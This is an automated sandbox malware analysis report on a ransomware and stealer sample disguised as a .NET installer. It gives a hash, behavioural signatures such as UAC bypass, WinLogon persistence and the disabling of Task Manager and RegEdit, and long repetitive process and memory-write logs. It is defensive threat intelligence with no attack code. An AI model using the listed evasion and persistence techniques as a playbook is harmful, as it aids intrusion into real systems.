Malware Analysis Report

2025-03-15 00:56

Sample ID 240626-hvcj5svajk
Target dotNetFx40_Full_setup.exe
SHA256 fa1afff978325f8818ce3a559d67a58297d9154674de7fd8eb03656d93104425
Tags
defense_evasion evasion persistence privilege_escalation ransomware spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

fa1afff978325f8818ce3a559d67a58297d9154674de7fd8eb03656d93104425

Threat Level: Known bad

The file dotNetFx40_Full_setup.exe was found to be: Known bad.

Malicious Activity Summary

defense_evasion evasion persistence privilege_escalation ransomware spyware stealer trojan

UAC bypass

Modifies WinLogon for persistence

Renames multiple (499) files with added filename extension

Blocklisted process makes network request

Disables Task Manager via registry modification

Downloads MZ/PE file

Disables RegEdit via registry modification

Boot or Logon Autostart Execution: Active Setup

Checks computer location settings

Executes dropped EXE

Modifies system executable filetype association

Reads user/profile data of web browsers

Loads dropped DLL

Drops desktop.ini file(s)

Enumerates connected drives

Legitimate hosting services abused for malware hosting/C2

Drops file in Program Files directory

Drops file in Windows directory

Access Token Manipulation: Create Process with Token

Enumerates physical storage devices

Enumerates system info in registry

Suspicious use of FindShellTrayWindow

Suspicious behavior: RenamesItself

Modifies Control Panel

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Checks processor information in registry

Suspicious use of SendNotifyMessage

System policy modification

Modifies data under HKEY_USERS

Views/modifies file attributes

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-26 07:03

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-26 07:03

Reported

2024-06-26 07:33

Platform

win7-20240419-en

Max time kernel

1799s

Max time network

1749s

Command Line

"C:\Users\Admin\AppData\Local\Temp\dotNetFx40_Full_setup.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\fefeab4e7d649df28de52093ebac6b\Setup.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\fefeab4e7d649df28de52093ebac6b\Setup.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\fefeab4e7d649df28de52093ebac6b\Setup.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2976 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\dotNetFx40_Full_setup.exe C:\fefeab4e7d649df28de52093ebac6b\Setup.exe
PID 2976 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\dotNetFx40_Full_setup.exe C:\fefeab4e7d649df28de52093ebac6b\Setup.exe
PID 2976 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\dotNetFx40_Full_setup.exe C:\fefeab4e7d649df28de52093ebac6b\Setup.exe
PID 2976 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\dotNetFx40_Full_setup.exe C:\fefeab4e7d649df28de52093ebac6b\Setup.exe
PID 2976 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\dotNetFx40_Full_setup.exe C:\fefeab4e7d649df28de52093ebac6b\Setup.exe
PID 2976 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\dotNetFx40_Full_setup.exe C:\fefeab4e7d649df28de52093ebac6b\Setup.exe
PID 2976 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\dotNetFx40_Full_setup.exe C:\fefeab4e7d649df28de52093ebac6b\Setup.exe
PID 2080 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 2740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 2740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 2740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Users\Admin\AppData\Local\Temp\dotNetFx40_Full_setup.exe

"C:\Users\Admin\AppData\Local\Temp\dotNetFx40_Full_setup.exe"

C:\fefeab4e7d649df28de52093ebac6b\Setup.exe

C:\fefeab4e7d649df28de52093ebac6b\\Setup.exe /x86 /x64 /ia64 /web

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6849758,0x7fef6849768,0x7fef6849778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1128 --field-trial-handle=1220,i,14937255884344643408,17197949225456008359,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1556 --field-trial-handle=1220,i,14937255884344643408,17197949225456008359,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1620 --field-trial-handle=1220,i,14937255884344643408,17197949225456008359,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2300 --field-trial-handle=1220,i,14937255884344643408,17197949225456008359,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2308 --field-trial-handle=1220,i,14937255884344643408,17197949225456008359,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1248 --field-trial-handle=1220,i,14937255884344643408,17197949225456008359,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1432 --field-trial-handle=1220,i,14937255884344643408,17197949225456008359,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3408 --field-trial-handle=1220,i,14937255884344643408,17197949225456008359,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2944 --field-trial-handle=1220,i,14937255884344643408,17197949225456008359,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3008 --field-trial-handle=1220,i,14937255884344643408,17197949225456008359,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3612 --field-trial-handle=1220,i,14937255884344643408,17197949225456008359,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2640 --field-trial-handle=1220,i,14937255884344643408,17197949225456008359,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2616 --field-trial-handle=1220,i,14937255884344643408,17197949225456008359,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

